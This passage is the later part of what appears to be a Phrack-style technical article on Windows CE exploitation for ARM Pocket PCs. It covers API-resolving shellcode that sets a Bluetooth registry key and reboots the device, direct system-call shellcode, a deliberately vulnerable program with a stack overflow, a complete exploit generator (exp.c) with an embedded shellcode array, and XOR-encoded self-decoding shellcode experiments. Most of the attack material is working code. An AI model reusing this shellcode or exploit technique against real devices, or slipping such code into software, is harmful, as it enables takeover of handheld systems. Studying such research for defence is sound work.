ldr r9, [r5, r9, LSL #2]; function address rva
|
||
add r9, r9, r0 ; function address
|
||
|
||
str r9, [r8], #4
|
||
subs r2, r2, #1
|
||
bne find_func_loop
|
||
|
||
mov pc, lr
|
||
ENDP
|
||
|
||
kd DCB 0x00, 0xc8, 0xff, 0xff ; 0xffffc800
|
||
sf DCB 0x3c, 0x00, 0x01, 0x01 ; 0x0101003c
|
||
|
||
fn DCB 0xe7, 0x9d, 0x3a, 0x28 ; KernelIoControl
|
||
DCB 0x51, 0xdf, 0xf7, 0x0b ; RegOpenKeyExW
|
||
DCB 0xc0, 0xfe, 0xc0, 0xd8 ; RegSetValueExW
|
||
DCB 0x83, 0x17, 0x51, 0x0e ; RegCloseKey
|
||
|
||
key DCB "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0
|
||
DCB "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0
|
||
DCB "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0
|
||
DCB "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0
|
||
DCB "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0
|
||
|
||
val DCB "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0
|
||
DCB "e", 0x0, 0x0, 0x0
|
||
|
||
coredll DCB "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
|
||
DCB ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0
|
||
|
||
ALIGN 4
|
||
|
||
LTORG
|
||
test_end
|
||
|
||
WinMainCRTStartup PROC
|
||
b test_code_start
|
||
ENDP
|
||
|
||
END
|
||
|
||
This shellcode constructs with three parts. Firstly, it calls the
|
||
get_export_section function to obtain the virtual base address of coredll
|
||
and its virtual relative address of export table position. The r0 and r1
|
||
stored them. Second, it calls the find_func function to obtain the API
|
||
address through IMAGE_EXPORT_DIRECTORY structure and stores the API
|
||
addresses to its own hash value address. The last part is the function
|
||
implement of our shellcode, it changes the register key
|
||
HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and then uses
|
||
KernelIoControl to soft restart the system.
|
||
|
||
Windows CE.NET provides BthGetMode and BthSetMode to get and set the
|
||
bluetooth state. But HP IPAQs use the Widcomm stack which has its own API,
|
||
so BthSetMode can't open the bluetooth for IPAQ. Well, there is another
|
||
way to open bluetooth in IPAQs(My PDA is HP1940). Just changing
|
||
HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and reset the PDA,
|
||
the bluetooth will open after system restart. This method is not pretty,
|
||
but it works.
|
||
|
||
Well, let's look at the get_export_section function. Why I commented off
|
||
"ldr r4, =0xffffc800" instruction? We must notice ARM assembly language's
|
||
LDR pseudo-instruction. It can load a register with a 32-bit constant
|
||
value or an address. The instruction "ldr r4, =0xffffc800" will be
|
||
"ldr r4, [pc, #0x108]" in EVC debugger, and the r4 register depends on the
|
||
program. So the r4 register won't get the 0xffffc800 value in shellcode,
|
||
and the shellcode will fail. The instruction "ldr r5, =0x324" will be
|
||
"mov r5, #0xC9, 30" in EVC debugger, its ok when the shellcode is executed
|
||
. The simple solution is to write the large constant value among the
|
||
shellcode, and then use the ADR pseudo-instruction to load the address of
|
||
value to register and then read the memory to register.
|
||
|
||
To save size, we can use hash technology to encode the API names. Each API
|
||
name will be encoded into 4 bytes. The hash technology is come from LSD's
|
||
Win32 Assembly Components.
|
||
|
||
The compile method is as following:
|
||
|
||
armasm test.asm
|
||
link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj
|
||
|
||
You must install the EVC environment first. After this, we can obtain the
|
||
necessary opcodes from EVC debugger or IDAPro or hex editors.
|
||
|
||
|
||
--[ 8 - System Call
|
||
|
||
First, let's look at the implementation of an API in coredll.dll:
|
||
|
||
.text:01F75040 EXPORT PowerOffSystem
|
||
.text:01F75040 PowerOffSystem ; CODE XREF: SetSystemPowerState+58p
|
||
.text:01F75040 STMFD SP!, {R4,R5,LR}
|
||
.text:01F75044 LDR R5, =0xFFFFC800
|
||
.text:01F75048 LDR R4, =unk_1FC6760
|
||
.text:01F7504C LDR R0, [R5] ; UTlsPtr
|
||
.text:01F75050 LDR R1, [R0,#-0x14] ; KTHRDINFO
|
||
.text:01F75054 TST R1, #1
|
||
.text:01F75058 LDRNE R0, [R4] ; 0x8004B138 ppfnMethods
|
||
.text:01F7505C CMPNE R0, #0
|
||
.text:01F75060 LDRNE R1, [R0,#0x13C] ; 0x8006C92C SC_PowerOffSystem
|
||
.text:01F75064 LDREQ R1, =0xF000FEC4 ; trap address of SC_PowerOffSystem
|
||
.text:01F75068 MOV LR, PC
|
||
.text:01F7506C MOV PC, R1
|
||
.text:01F75070 LDR R3, [R5]
|
||
.text:01F75074 LDR R0, [R3,#-0x14]
|
||
.text:01F75078 TST R0, #1
|
||
.text:01F7507C LDRNE R0, [R4]
|
||
.text:01F75080 CMPNE R0, #0
|
||
.text:01F75084 LDRNE R0, [R0,#0x25C] ; SC_KillThreadIfNeeded
|
||
.text:01F75088 MOVNE LR, PC
|
||
.text:01F7508C MOVNE PC, R0
|
||
.text:01F75090 LDMFD SP!, {R4,R5,PC}
|
||
.text:01F75090 ; End of function PowerOffSystem
|
||
|
||
Debugging into this API, we found the system will check the KTHRDINFO
|
||
first. This value was initialized in the MDCreateMainThread2 function of
|
||
PRIVATE\WINCEOS\COREOS\NK\KERNEL\ARM\mdram.c:
|
||
|
||
...
|
||
if (kmode || bAllKMode) {
|
||
pTh->ctx.Psr = KERNEL_MODE;
|
||
KTHRDINFO (pTh) |= UTLS_INKMODE;
|
||
} else {
|
||
pTh->ctx.Psr = USER_MODE;
|
||
KTHRDINFO (pTh) &= ~UTLS_INKMODE;
|
||
}
|
||
...
|
||
|
||
If the application is in kernel mode, this value will be set with 1,
|
||
otherwise it will be 0. All applications of Pocket PC run in kernel mode,
|
||
so the system follow by "LDRNE R0, [R4]". In my environment, the R0 got
|
||
0x8004B138 which is the ppfnMethods pointer of SystemAPISets[SH_WIN32],
|
||
and then it flow to "LDRNE R1, [R0,#0x13C]". Let's look the offset 0x13C
|
||
(0x13C/4=0x4F) and corresponding to the index of Win32Methods defined in
|
||
PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h:
|
||
|
||
const PFNVOID Win32Methods[] = {
|
||
...
|
||
(PFNVOID)SC_PowerOffSystem, // 79
|
||
...
|
||
};
|
||
|
||
Well, the R1 got the address of SC_PowerOffSystem which is implemented in
|
||
kernel. The instruction "LDREQ R1, =0xF000FEC4" has no effect when the
|
||
application run in kernel mode. The address 0xF000FEC4 is system call
|
||
which used by user mode. Some APIs use system call directly, such as
|
||
SetKMode:
|
||
|
||
.text:01F756C0 EXPORT SetKMode
|
||
.text:01F756C0 SetKMode
|
||
.text:01F756C0
|
||
.text:01F756C0 var_4 = -4
|
||
.text:01F756C0
|
||
.text:01F756C0 STR LR, [SP,#var_4]!
|
||
.text:01F756C4 LDR R1, =0xF000FE50
|
||
.text:01F756C8 MOV LR, PC
|
||
.text:01F756CC MOV PC, R1
|
||
.text:01F756D0 LDMFD SP!, {PC}
|
||
|
||
Windows CE doesn't use ARM's SWI instruction to implement system call, it
|
||
implements in different way. A system call is made to an invalid address
|
||
in the range 0xf0000000 - 0xf0010000, and this causes a prefetch-abort
|
||
trap, which is handled by PrefetchAbort implemented in armtrap.s.
|
||
PrefetchAbort will check the invalid address first, if it is in trap area
|
||
then using ObjectCall to locate the system call and executed, otherwise
|
||
calling ProcessPrefAbort to deal with the exception.
|
||
|
||
There is a formula to calculate the system call address:
|
||
|
||
0xf0010000-(256*apiset+apinr)*4
|
||
|
||
The api set handles are defined in PUBLIC\COMMON\SDK\INC\kfuncs.h and
|
||
PUBLIC\COMMON\OAK\INC\psyscall.h, and the aipnrs are defined in several
|
||
files, for example SH_WIN32 calls are defined in
|
||
PRIVATE\WINCEOS\COREOS\NK\KERNEL\kwin32.h.
|
||
|
||
Well, let's calculate the system call of KernelIoControl. The apiset is 0
|
||
and the apinr is 99, so the system call is 0xf0010000-(256*0+99)*4 which
|
||
is 0xF000FE74. The following is the shellcode implemented by system call:
|
||
|
||
#include "stdafx.h"
|
||
|
||
int shellcode[] =
|
||
{
|
||
0xE59F0014, // ldr r0, [pc, #20]
|
||
0xE59F4014, // ldr r4, [pc, #20]
|
||
0xE3A01000, // mov r1, #0
|
||
0xE3A02000, // mov r2, #0
|
||
0xE3A03000, // mov r3, #0
|
||
0xE1A0E00F, // mov lr, pc
|
||
0xE1A0F004, // mov pc, r4
|
||
0x0101003C, // IOCTL_HAL_REBOOT
|
||
0xF000FE74, // trap address of KernelIoControl
|
||
};
|
||
|
||
int WINAPI WinMain( HINSTANCE hInstance,
|
||
HINSTANCE hPrevInstance,
|
||
LPTSTR lpCmdLine,
|
||
int nCmdShow)
|
||
{
|
||
((void (*)(void)) & shellcode)();
|
||
|
||
return 0;
|
||
}
|
||
|
||
It works fine and we don't need search API addresses.
|
||
|
||
|
||
--[ 9 - Windows CE Buffer Overflow Exploitation
|
||
|
||
The hello.cpp is the demonstration vulnerable program:
|
||
|
||
// hello.cpp
|
||
//
|
||
|
||
#include "stdafx.h"
|
||
|
||
int hello()
|
||
{
|
||
FILE * binFileH;
|
||
char binFile[] = "\\binfile";
|
||
char buf[512];
|
||
|
||
if ( (binFileH = fopen(binFile, "rb")) == NULL )
|
||
{
|
||
printf("can't open file %s!\n", binFile);
|
||
return 1;
|
||
}
|
||
|
||
memset(buf, 0, sizeof(buf));
|
||
fread(buf, sizeof(char), 1024, binFileH);
|
||
|
||
printf("%08x %d\n", &buf, strlen(buf));
|
||
getchar();
|
||
|
||
fclose(binFileH);
|
||
return 0;
|
||
}
|
||
|
||
int WINAPI WinMain( HINSTANCE hInstance,
|
||
HINSTANCE hPrevInstance,
|
||
LPTSTR lpCmdLine,
|
||
int nCmdShow)
|
||
{
|
||
hello();
|
||
return 0;
|
||
}
|
||
|
||
The hello function has a buffer overflow problem. It reads data from the
|
||
"binfile" of the root directory to stack variable "buf" by fread().
|
||
Because it reads 1KB contents, so if the "binfile" is larger than 512
|
||
bytes, the stack variable "buf" will be overflowed.
|
||
|
||
The printf and getchar are just for test. They have no effect without
|
||
console.dll in windows direcotry. The console.dll file is come from
|
||
Windows Mobile Developer Power Toys.
|
||
|
||
ARM assembly language uses bl instruction to call function. Let's look
|
||
into the hello function:
|
||
|
||
6: int hello()
|
||
7: {
|
||
22011000 str lr, [sp, #-4]!
|
||
22011004 sub sp, sp, #0x89, 30
|
||
8: FILE * binFileH;
|
||
9: char binFile[] = "\\binfile";
|
||
...
|
||
...
|
||
26: }
|
||
220110C4 add sp, sp, #0x89, 30
|
||
220110C8 ldmia sp!, {pc}
|
||
|
||
"str lr, [sp, #-4]!" is the first instruction of the hello() function. It
|
||
stores the lr register to stack, and the lr register contains the return
|
||
address of hello caller. The second instruction prepairs stack memory for
|
||
local variables. "ldmia sp!, {pc}" is the last instruction of the hello()
|
||
function. It loads the return address of hello caller that stored in the
|
||
stack to the pc register, and then the program will execute into WinMain
|
||
function. So overwriting the lr register that is stored in the stack will
|
||
obtain control when the hello function returned.
|
||
|
||
The variable's memory address that allocated by program is corresponding
|
||
to the loaded Slot, both stack and heap. The process may be loaded into
|
||
difference Slot at each start time. So the base address always alters. We
|
||
know that the slot 0 is mapped from the current process' slot, so the base
|
||
of its stack address is stable.
|
||
|
||
The following is the exploit of hello program:
|
||
|
||
/* exp.c - Windows CE Buffer Overflow Demo
|
||
*
|
||
* san@xfocus.org
|
||
*/
|
||
#include<stdio.h>
|
||
|
||
#define NOP 0xE1A01001 /* mov r1, r1 */
|
||
#define LR 0x0002FC50 /* return address */
|
||
|
||
int shellcode[] =
|
||
{
|
||
0xEB000026,
|
||
0xE3A02004,
|
||
0xEB00003A,
|
||
0xE24DDF89,
|
||
0xE28D0008,
|
||
0xE58D0000,
|
||
0xE3A03002,
|
||
0xE3A02000,
|
||
0xE28F1F56,
|
||
0xE3A0010A,
|
||
0xE1A0E00F,
|
||
0xE518F00C,
|
||
0xE3A00001,
|
||
0xE58D000C,
|
||
0xE3A03004,
|
||
0xE58D3004,
|
||
0xE28D100C,
|
||
0xE58D1000,
|
||
0xE28F1F5F,
|
||
0xE59D0008,
|
||
0xE1A0E00F,
|
||
0xE518F008,
|
||
0xE59D0008,
|
||
0xE1A0E00F,
|
||
0xE518F004,
|
||
0xE28F0C01,
|
||
0xE5900000,
|
||
0xE3A01000,
|
||
0xE3A02000,
|
||
0xE3A03000,
|
||
0xE1A0E00F,
|
||
0xE518F010,
|
||
0xE0D020B2,
|
||
0xE0D130B2,
|
||
0xE3520000,
|
||
0x03530000,
|
||
0x01A0F00E,
|
||
0xE1520003,
|
||
0x0AFFFFF8,
|
||
0xE1A0F00E,
|
||
0xE1A0B00E,
|
||
0xE28F40BC,
|
||
0xE5944000,
|
||
0xE3A05FC9,
|
||
0xE0845005,
|
||
0xE5955000,
|
||
0xE1A06005,
|
||
0xE3A07000,
|
||
0xE5960008,
|
||
0xE28F1F45,
|
||
0xEBFFFFEC,
|
||
0x0596707C,
|
||
0x0596808C,
|
||
0xE0879008,
|
||
0x0A000003,
|
||
0xE5966004,
|
||
0xE3560000,
|
||
0x11560005,
|
||
0x1AFFFFF4,
|
||
0xE1A00007,
|
||
0xE0881007,
|
||
0xE1A0F00B,
|
||
0xE28F8070,
|
||
0xE5914020,
|
||
0xE0844000,
|
||
0xE3A06000,
|
||
0xE4947004,
|
||
0xE0877000,
|
||
0xE3A0A000,
|
||
0xE4D79001,
|
||
0xE3590000,
|
||
0x0A000001,
|
||
0xE089A3EA,
|
||
0xEAFFFFFA,
|
||
0xE5989000,
|
||
0xE15A0009,
|
||
0x12866001,
|
||
0x1AFFFFF3,
|
||
0xE5915024,
|
||
0xE0855000,
|
||
0xE0866006,
|
||
0xE19590B6,
|
||
0xE591501C,
|
||
0xE0855000,
|
||
0xE7959109,
|
||
0xE0899000,
|
||
0xE4889004,
|
||
0xE2522001,
|
||
0x1AFFFFE5,
|
||
0xE1A0F00E,
|
||
0xFFFFC800,
|
||
0x0101003C,
|
||
0x283A9DE7,
|
||
0x0BF7DF51,
|
||
0xD8C0FEC0,
|
||
0x0E511783,
|
||
0x004F0053,
|
||
0x00540046,
|
||
0x00410057,
|
||
0x00450052,
|
||
0x005C005C,
|
||
0x00690057,
|
||
0x00630064,
|
||
0x006D006F,
|
||
0x005C006D,
|
||
0x0042005C,
|
||
0x00430074,
|
||
0x006E006F,
|
||
0x00690066,
|
||
0x005C0067,
|
||
0x0047005C,
|
||
0x006E0065,
|
||
0x00720065,
|
||
0x006C0061,
|
||
0x00000000,
|
||
0x00740053,
|
||
0x00630061,
|
||
0x004D006B,
|
||
0x0064006F,
|
||
0x00000065,
|
||
0x006F0063,
|
||
0x00650072,
|
||
0x006C0064,
|
||
0x002E006C,
|
||
0x006C0064,
|
||
0x0000006C,
|
||
};
|
||
|
||
/* prints a long to a string */
|
||
char* put_long(char* ptr, long value)
|
||
{
|
||
*ptr++ = (char) (value >> 0) & 0xff;
|
||
*ptr++ = (char) (value >> 8) & 0xff;
|
||
*ptr++ = (char) (value >> 16) & 0xff;
|
||
*ptr++ = (char) (value >> 24) & 0xff;
|
||
|
||
return ptr;
|
||
}
|
||
|
||
int main()
|
||
{
|
||
FILE * binFileH;
|
||
char binFile[] = "binfile";
|
||
char buf[544];
|
||
char *ptr;
|
||
int i;
|
||
|
||
if ( (binFileH = fopen(binFile, "wb")) == NULL )
|
||
{
|
||
printf("can't create file %s!\n", binFile);
|
||
return 1;
|
||
}
|
||
|
||
memset(buf, 0, sizeof(buf)-1);
|
||
ptr = buf;
|
||
|
||
for (i = 0; i < 4; i++) {
|
||
ptr = put_long(ptr, NOP);
|
||
}
|
||
memcpy(buf+16, shellcode, sizeof(shellcode));
|
||
put_long(ptr-16+540, LR);
|
||
|
||
fwrite(buf, sizeof(char), 544, binFileH);
|
||
fclose(binFileH);
|
||
}
|
||
|
||
We choose a stack address of slot 0, and it points to our shellcode. It
|
||
will overwrite the return address that stored in the stack. We can also
|
||
use a jump address of virtual memory space of the process instead of. This
|
||
exploit produces a "binfile" that will overflow the "buf" variable and the
|
||
return address that stored in the stack.
|
||
|
||
After the binfile copied to the PDA, the PDA restarts and open the
|
||
bluetooth when the hello program is executed. That's means the hello
|
||
program flowed to our shellcode.
|
||
|
||
While I changed another method to construct the exploit string, its as
|
||
following:
|
||
|
||
pad...pad|return address|nop...nop...shellcode
|
||
|
||
And the exploit produces a 1KB "binfile". But the PDA is freeze when the
|
||
hello program is executed. It was confused, I think maybe the stack of
|
||
Windows CE is small and the overflow string destroyed the 2KB guard on the
|
||
top of stack. It is freeze when the program call a API after overflow
|
||
occurred. So, we must notice the features of stack while writing exploit
|
||
for Windows CE.
|
||
|
||
EVC has some bugs that make debug difficult. First, EVC will write some
|
||
arbitrary data to the stack contents when the stack releases at the end of
|
||
function, so the shellcode maybe modified. Second, the instruction at
|
||
breakpoint maybe change to 0xE6000010 in EVC while debugging. Another bug
|
||
is funny, the debugger without error while writing data to a .text address
|
||
by step execute, but it will capture a access violate exception by execute
|
||
directly.
|
||
|
||
|
||
--[ 10 - About Decoding Shellcode
|
||
|
||
The shellcode we talked above is a concept shellcode which contains lots
|
||
of zeros. It executed correctly in this demonstrate program, but some other
|
||
vulnerable programs maybe filter the special characters before buffer
|
||
overflow in some situations. For example overflowed by strcpy, the
|
||
shellcode will be cut by the zero.
|
||
|
||
It is difficult and inconvenient to write a shellcode without special
|
||
characters by API search method. So we think about the decoding shellcode.
|
||
Decoding shellcode will convert the special characters to fit characters
|
||
and make the real shellcode more universal.
|
||
|
||
The newer ARM processor(such as arm9 and arm10) has a Harvard architecture
|
||
which separates instruction cache and data cache. This feature will
|
||
improve the performance of processor, and most of RISC processors have
|
||
this feature. But the self-modifying code is not easy to implement,
|
||
because it will puzzled by the caches and the processor implementation
|
||
after being modified.
|
||
|
||
Let's look at the following code first:
|
||
|
||
#include "stdafx.h"
|
||
|
||
int weird[] =
|
||
{
|
||
0xE3A01099, // mov r1, #0x99
|
||
|
||
0xE5CF1020, // strb r1, [pc, #0x20]
|
||
0xE5CF1020, // strb r1, [pc, #0x20]
|
||
0xE5CF1020, // strb r1, [pc, #0x20]
|
||
0xE5CF1020, // strb r1, [pc, #0x20]
|
||
|
||
0xE1A01001, // mov r1, r1 ; pad
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
|
||
0xE3A04001, // mov r4, #0x1
|
||
0xE3A03001, // mov r3, #0x1
|
||
0xE3A02001, // mov r2, #0x1
|
||
0xE3A01001, // mov r1, #0x1
|
||
0xE6000010, // breakpoint
|
||
};
|
||
|
||
int WINAPI WinMain( HINSTANCE hInstance,
|
||
HINSTANCE hPrevInstance,
|
||
LPTSTR lpCmdLine,
|
||
int nCmdShow)
|
||
{
|
||
((void (*)(void)) & weird)();
|
||
|
||
return 0;
|
||
}
|
||
|
||
That four strb instructions will change the immediate value of the below
|
||
mov instructions to 0x99. It will break at that inserted breakpoint while
|
||
executing this code in EVC debugger directly. The r1-r4 registers got 0x99
|
||
in S3C2410 which is a arm9 core processor. It needs more nop instructions
|
||
to pad after modified to let the r1-r4 got 0x99 while I tested this code
|
||
in my friend's PDA which has a Intel Xscale processor. I think the reason
|
||
maybe is that the arm9 has 5 pipelines and the arm10 has 6 pipelines. Well
|
||
, I changed it to another method:
|
||
|
||
0xE28F3053, // add r3, pc, #0x53
|
||
|
||
0xE3A01010, // mov r1, #0x10
|
||
0xE7D32001, // ldrb r2, [r3, +r1]
|
||
0xE2222088, // eor r2, r2, #0x88
|
||
0xE7C32001, // strb r2, [r3, +r1]
|
||
0xE2511001, // subs r1, r1, #1
|
||
0x1AFFFFFA, // bne 28011008
|
||
|
||
//0xE1A0100F, // mov r1, pc
|
||
//0xE3A02020, // mov r2, #0x20
|
||
//0xE3A03D05, // mov r3, #5, 26
|
||
//0xEE071F3A, // mcr p15, 0, r1, c7, c10, 1 ; clean and invalidate each entry
|
||
//0xE0811002, // add r1, r1, r2
|
||
//0xE0533002, // subs r3, r3, r2
|
||
//0xCAFFFFFB, // bgt |weird+28h (30013058)|
|
||
//0xE0211001, // eor r1, r1, r1
|
||
//0xEE071F9A, // mcr p15, 0, r1, c7, c10, 4 ; drain write buffer
|
||
//0xEE071F15, // mcr p15, 0, r1, c7, c5, 0 ; flush the icache
|
||
0xE1A01001, // mov r1, r1 ; pad
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
0xE1A01001,
|
||
|
||
0x6B28C889, // mov r4, #0x1 ; encoded
|
||
0x6B28B889, // mov r3, #0x1
|
||
0x6B28A889, // mov r2, #0x1
|
||
0x6B289889, // mov r1, #0x1
|
||
0xE6000010, // breakpoint
|
||
|
||
The four mov instructions were encoded by Exclusive-OR with 0x88, the
|
||
decoder has a loop to load a encoded byte and Exclusive-OR it with 0x88
|
||
and then stored it to the original position. The r1-r4 registers won't get
|
||
0x1 even you put a lot of pad instructions after decoded in both arm9 and
|
||
arm10 processors. I think maybe that the load instruction bring on a cache
|
||
problem.
|
||
|
||
ARM Architecture Reference Manual has a chapter to introduce how to deal
|
||
with self-modifying code. It says the caches will be flushed by an
|
||
operating system call. Phil, the guy from 0dd shared his experience to me.
|
||
He said he's used this method successful on ARM system(I think his
|
||
environment maybe is Linux). Well, this method is successful on AIX PowerPC
|
||
and Solaris SPARC too(I've tested it). But SWI implements in a different
|
||
way under Windows CE. The armtrap.s contains implementation of SWIHandler
|
||
which does nothing except 'movs pc,lr'. So it has no effect after decode
|
||
finished.
|
||
|
||
Because Pocket PC's applications run in kernel mode, so we have privilege
|
||
to access the system control coprocessor. ARM Architecture Reference
|
||
Manual introduces memory system and how to handle cache via the system
|
||
control coprocessor. After looked into this manual, I tried to disable the
|
||
instruction cache before decode:
|
||
|
||
mrc p15, 0, r1, c1, c0, 0
|
||
bic r1, r1, #0x1000
|
||
mcr p15, 0, r1, c1, c0, 0
|
||
|
||
But the system freezed when the mcr instruction executed. Then I tried to
|
||
invalidate entire instruction cache after decoded:
|
||
|
||
eor r1, r1, r1
|
||
mcr p15, 0, r1, c7, c5, 0
|
||
|
||
But it has no effect too.
|
||
|
||
|
||
--[ 11 - Conclusion
|
||
|
||
The codes talked above are the real-life buffer overflow example on
|
||
Windows CE. It is not perfect, but I think this technology will be improved
|
||
in the future.
|
||
|
||
Because of the cache mechanism, the decoding shellcode is not good enough.
|
||
|
||
Internet and handset devices are growing quickly, so threats to the PDAs
|
||
and mobiles become more and more serious. And the patch of Windows CE is
|
||
more difficult and dangerous than the normal Windows system to customers.
|
||
Because the entire Windows CE system is stored in the ROM, if you want to
|
||
patch the system flaws, you must flush the ROM, And the ROM images of
|
||
various vendors or modes of PDAs and mobiles aren't compatible.
|
||
|
||
|
||
--[ 12 - Greetings
|
||
|
||
Special greets to the dudes of XFocus Team, my girlfriend, the life will
|
||
fade without you.
|
||
Special thanks to the Research Department of NSFocus Corporation, I love
|
||
this team.
|
||
And I'll show my appreciation to 0dd members, Nasiry and Flier too, the
|
||
discussions with them were nice.
|
||
|
||
|
||
--[ 13 - References
|
||
|
||
[1] ARM Architecture Reference Manual
|
||
http://www.arm.com
|
||
[2] Windows CE 4.2 Source Code
|
||
http://msdn.microsoft.com/embedded/windowsce/default.aspx
|
||
[3] Details Emerge on the First Windows Mobile Virus
|
||
- Cyrus Peikari, Seth Fogie, Ratter/29A
|
||
http://www.informit.com/articles/article.asp?p=337071
|
||
[4] Pocket PC Abuse - Seth Fogie
|
||
http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-fogie/bh-us-04-fogie-up.pdf
|
||
[5] misc notes on the xda and windows ce
|
||
http://www.xs4all.nl/~itsme/projects/xda/
|
||
[6] Introduction to Windows CE
|
||
http://www.cs-ipv6.lancs.ac.uk/acsp/WinCE/Slides/
|
||
[7] Nasiry 's way
|
||
http://www.cnblogs.com/nasiry/
|
||
[8] Programming Windows CE Second Edition - Doug Boling
|
||
[9] Win32 Assembly Components
|
||
http://LSD-PL.NET
|
||
|
||
|=[ EOF ]=--------------------------------------------------------------=|
|